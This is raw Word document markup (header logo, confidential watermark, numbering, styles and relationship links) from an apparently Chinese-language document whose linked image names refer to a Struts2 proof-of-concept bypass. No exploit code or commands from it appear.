          <wp:effectExtent l="19050" t="0" r="9525" b="0"/>
          <wp:wrapNone/>
          <wp:docPr id="1" name="图片 3" descr="说明: F:\各种logo\kingde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F:\各种logo\kingdee.wmf"/>
                  <pic:cNvPicPr>
                    <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                  </pic:cNvPicPr>
                </pic:nvPicPr>
                <pic:blipFill>
                  <a:blip r:embed="rId1"/>
                  <a:srcRect/>
                  <a:stretch>
                    <a:fillRect/>
                  </a:stretch>
                </pic:blipFill>
                <pic:spPr bwMode="auto">
                  <a:xfrm>
                    <a:off x="0" y="0"/>
                    <a:ext cx="1343025" cy="31940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2934" w:rsidRDefault="00B422B9">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49359" o:spid="_x0000_s2050" type="#_x0000_t136" style="position:absolute;left:0;text-align:left;margin-left:0;margin-top:0;width:531pt;height:88.5pt;rotation:315;z-index:-251659264;mso-position-horizontal:center;mso-position-horizontal-relative:margin;mso-position-vertical:center;mso-position-vertical-relative:margin" o:allowincell="f" fillcolor="#d8d8d8" stroked="f">
          <v:fill opacity=".5"/>
          <v:textpath style="font-family:&quot;宋体&quot;;font-size:1pt" string="Confidentia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764538"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="480E9F9C"/>
    <w:lvl w:ilvl="0" w:tplc="9FAE883E">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="720"/>
        </w:tabs>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="181A09B8" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="22B6FA34" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="2160"/>
        </w:tabs>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="4E54718C" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="2880"/>
        </w:tabs>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="7B4A5C12" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="3600"/>
        </w:tabs>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="8F2E499E" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="4320"/>
        </w:tabs>
        <w:ind w:left="4320" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="8F9615DA" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="5040"/>
        </w:tabs>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="BCD27644" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="5760"/>
        </w:tabs>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="9312AD44"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C49F9"/>
    <w:rsid w:val="00026BCE"/>
    <w:rsid w:val="00044C81"/>
    <w:rsid w:val="00067A2E"/>
    <w:rsid w:val="000A2612"/>
    <w:rsid w:val="000A57EB"/>
    <w:rsid w:val="000D26B6"/>
    <w:rsid w:val="001256E1"/>
    <w:rsid w:val="00132A14"/>
    <w:rsid w:val="001A657E"/>
    <w:rsid w:val="002176D3"/>
    <w:rsid w:val="00225B8A"/>
    <w:rsid w:val="002A2E7C"/>
    <w:rsid w:val="002C5BA6"/>
    <w:rsid w:val="002D068E"/>
    <w:rsid w:val="00325BC1"/>
    <w:rsid w:val="0038317E"/>
    <w:rsid w:val="003A5856"/>
    <w:rsid w:val="003D32A9"/>
    <w:rsid w:val="003D5531"/>
    <w:rsid w:val="003E226D"/>
    <w:rsid w:val="00400747"/>
    <w:rsid w:val="00425416"/>
    <w:rsid w:val="00460887"/>
    <w:rsid w:val="0048668C"/>
    <w:rsid w:val="004902B7"/>
    <w:rsid w:val="004D2956"/>
    <w:rsid w:val="004F36AF"/>
    <w:rsid w:val="00502B5B"/>
    <w:rsid w:val="00544DF6"/>
    <w:rsid w:val="00553603"/>
    <w:rsid w:val="005630F4"/>
    <w:rsid w:val="00570DCC"/>
    <w:rsid w:val="00577A0F"/>
    <w:rsid w:val="00590E32"/>
    <w:rsid w:val="005D008F"/>
    <w:rsid w:val="00600EBB"/>
    <w:rsid w:val="00624C0C"/>
    <w:rsid w:val="00651892"/>
    <w:rsid w:val="006534F4"/>
    <w:rsid w:val="00665F57"/>
    <w:rsid w:val="00672EFB"/>
    <w:rsid w:val="00682934"/>
    <w:rsid w:val="006B05C6"/>
    <w:rsid w:val="006C162F"/>
    <w:rsid w:val="006C237E"/>
    <w:rsid w:val="006F71F9"/>
    <w:rsid w:val="00725C1A"/>
    <w:rsid w:val="00751A9D"/>
    <w:rsid w:val="00752689"/>
    <w:rsid w:val="0077437D"/>
    <w:rsid w:val="00790BA7"/>
    <w:rsid w:val="007971E2"/>
    <w:rsid w:val="007A5775"/>
    <w:rsid w:val="007C49F9"/>
    <w:rsid w:val="007D15BA"/>
    <w:rsid w:val="007D6EBD"/>
    <w:rsid w:val="00827EE3"/>
    <w:rsid w:val="00851504"/>
    <w:rsid w:val="008A1490"/>
    <w:rsid w:val="00927492"/>
    <w:rsid w:val="0096380B"/>
    <w:rsid w:val="00984F48"/>
    <w:rsid w:val="009C247C"/>
    <w:rsid w:val="009F2DF3"/>
    <w:rsid w:val="00A2053C"/>
    <w:rsid w:val="00A218A1"/>
    <w:rsid w:val="00A22B26"/>
    <w:rsid w:val="00A52109"/>
    <w:rsid w:val="00A82D97"/>
    <w:rsid w:val="00B07B2B"/>
    <w:rsid w:val="00B36581"/>
    <w:rsid w:val="00B422B9"/>
    <w:rsid w:val="00B44B7F"/>
    <w:rsid w:val="00BD72E3"/>
    <w:rsid w:val="00BE1662"/>
    <w:rsid w:val="00C07C43"/>
    <w:rsid w:val="00C23E71"/>
    <w:rsid w:val="00C3015C"/>
    <w:rsid w:val="00C33EAA"/>
    <w:rsid w:val="00C6429D"/>
    <w:rsid w:val="00CB1951"/>
    <w:rsid w:val="00CC0917"/>
    <w:rsid w:val="00D030F1"/>
    <w:rsid w:val="00D66129"/>
    <w:rsid w:val="00E35061"/>
    <w:rsid w:val="00E413A6"/>
    <w:rsid w:val="00E47828"/>
    <w:rsid w:val="00E87BF5"/>
    <w:rsid w:val="00E924F7"/>
    <w:rsid w:val="00EA12FD"/>
    <w:rsid w:val="00EB409A"/>
    <w:rsid w:val="00EC5F7C"/>
    <w:rsid w:val="00EF2F93"/>
    <w:rsid w:val="00F2316B"/>
    <w:rsid w:val="00F31DD5"/>
    <w:rsid w:val="00F552D7"/>
    <w:rsid w:val="00F66A55"/>
    <w:rsid w:val="00F7226B"/>
    <w:rsid w:val="00F94971"/>
    <w:rsid w:val="00FA4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070D055B-3D24-43AA-9EAC-7668E03F6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05C6"/>
    <w:pPr>
      <w:widowControl w:val="0"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:kern w:val="2"/>
      <w:sz w:val="21"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="3">
    <w:name w:val="heading 3"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="3Char"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="003A5856"/>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C237E"/>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3"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="006C237E"/>
    <w:rPr>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a4">
    <w:name w:val="footer"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="Char0"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="006C237E"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4153"/>
        <w:tab w:val="right" w:pos="8306"/>
      </w:tabs>
      <w:snapToGrid w:val="0"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:kern w:val="0"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Char0">
    <w:name w:val="页脚 Char"/>
    <w:link w:val="a4"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="006C237E"/>
    <w:rPr>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a5">
    <w:name w:val="Balloon Text"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="Char1"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="006C237E"/>
    <w:rPr>
      <w:kern w:val="0"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Char1">
    <w:name w:val="批注框文本 Char"/>
    <w:link w:val="a5"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="006C237E"/>
    <w:rPr>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="a6">
    <w:name w:val="Emphasis"/>
    <w:uiPriority w:val="20"/>
    <w:qFormat/>
    <w:rsid w:val="0048668C"/>
    <w:rPr>
      <w:i w:val="0"/>
      <w:iCs w:val="0"/>
      <w:color w:val="CC0000"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a7">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="a"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="00C33EAA"/>
    <w:pPr>
      <w:widowControl/>
      <w:ind w:firstLineChars="200" w:firstLine="420"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
      <w:kern w:val="0"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="3Char">
    <w:name w:val="标题 3 Char"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="3"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="003A5856"/>
    <w:rPr>
      <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="27"/>
      <w:szCs w:val="27"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a8">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="a"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="003A5856"/>
    <w:pPr>
      <w:widowControl/>
      <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
      <w:kern w:val="0"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="a9">
    <w:name w:val="Strong"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="22"/>
    <w:qFormat/>
    <w:rsid w:val="003A5856"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="aa">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="003A5856"/>
    <w:rPr>
      <w:color w:val="0000FF"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="HTML">
    <w:name w:val="HTML Preformatted"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="HTMLChar"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="003A58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3A5856"/>
    <w:rPr>
      <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="line">
    <w:name w:val="line"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="003A5856"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="function">
    <w:name w:val="function"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="003A5856"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="keyword">
    <w:name w:val="keyword"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="003A5856"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="title">
    <w:name w:val="title"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="003A5856"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="params">
    <w:name w:val="params"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="003A5856"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="string">
    <w:name w:val="string"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="003A5856"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="comment">
    <w:name w:val="comment"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="003A5856"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="annotation">
    <w:name w:val="annotation"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="003A5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08948">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1562785674">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1562252665">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="355935377">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                  <w:divsChild>
                    <w:div w:id="856386728">
                      <w:marLeft w:val="0"/>
                      <w:marRight w:val="0"/>
                      <w:marTop w:val="0"/>
                      <w:marBottom w:val="0"/>
                      <w:divBdr>
                        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                      </w:divBdr>
                      <w:divsChild>
                        <w:div w:id="467402887">
                          <w:marLeft w:val="0"/>
                          <w:marRight w:val="0"/>
                          <w:marTop w:val="105"/>
                          <w:marBottom w:val="0"/>
                          <w:divBdr>
                            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                          </w:divBdr>
                          <w:divsChild>
                            <w:div w:id="1034188198">
                              <w:marLeft w:val="0"/>
                              <w:marRight w:val="0"/>
                              <w:marTop w:val="0"/>
                              <w:marBottom w:val="0"/>
                              <w:divBdr>
                                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                              </w:divBdr>
                              <w:divsChild>
                                <w:div w:id="15952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037843">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1089042318">
          <w:marLeft w:val="547"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="134"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="1145781856">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1580215985">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="236986903">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="800340933">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                  <w:divsChild>
                    <w:div w:id="1381830732">
                      <w:marLeft w:val="0"/>
                      <w:marRight w:val="0"/>
                      <w:marTop w:val="0"/>
                      <w:marBottom w:val="0"/>
                      <w:divBdr>
                        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                      </w:divBdr>
                      <w:divsChild>
                        <w:div w:id="770709991">
                          <w:marLeft w:val="0"/>
                          <w:marRight w:val="0"/>
                          <w:marTop w:val="105"/>
                          <w:marBottom w:val="0"/>
                          <w:divBdr>
                            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                          </w:divBdr>
                          <w:divsChild>
                            <w:div w:id="669602743">
                              <w:marLeft w:val="0"/>
                              <w:marRight w:val="0"/>
                              <w:marTop w:val="0"/>
                              <w:marBottom w:val="0"/>
                              <w:divBdr>
                                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                              </w:divBdr>
                              <w:divsChild>
                                <w:div w:id="20793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442694">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="830682725">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1324703004">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="72899429">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                  <w:divsChild>
                    <w:div w:id="1328166515">
                      <w:marLeft w:val="0"/>
                      <w:marRight w:val="0"/>
                      <w:marTop w:val="0"/>
                      <w:marBottom w:val="0"/>
                      <w:divBdr>
                        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                      </w:divBdr>
                      <w:divsChild>
                        <w:div w:id="1169255270">
                          <w:marLeft w:val="0"/>
                          <w:marRight w:val="0"/>
                          <w:marTop w:val="105"/>
                          <w:marBottom w:val="0"/>
                          <w:divBdr>
                            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                          </w:divBdr>
                          <w:divsChild>
                            <w:div w:id="1676306204">
                              <w:marLeft w:val="0"/>
                              <w:marRight w:val="0"/>
                              <w:marTop w:val="0"/>
                              <w:marBottom w:val="0"/>
                              <w:divBdr>
                                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                              </w:divBdr>
                              <w:divsChild>
                                <w:div w:id="10044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567584">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="451050612">
          <w:blockQuote w:val="1"/>
          <w:marLeft w:val="131"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="156"/>
          <w:marBottom w:val="156"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="single" w:sz="18" w:space="7" w:color="2CA6CB"/>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iswin.org/attach/struts2_poc_bypass_1.png" TargetMode="External"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.iswin.org/attach/struts2_poc_bypass_6.png" TargetMode="External"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header3.xml"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image7.jpeg"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.iswin.org/attach/struts2_bypasspoc_2.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swin.org/attach/struts2_poc_bypass_4.png" TargetMode="External"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" 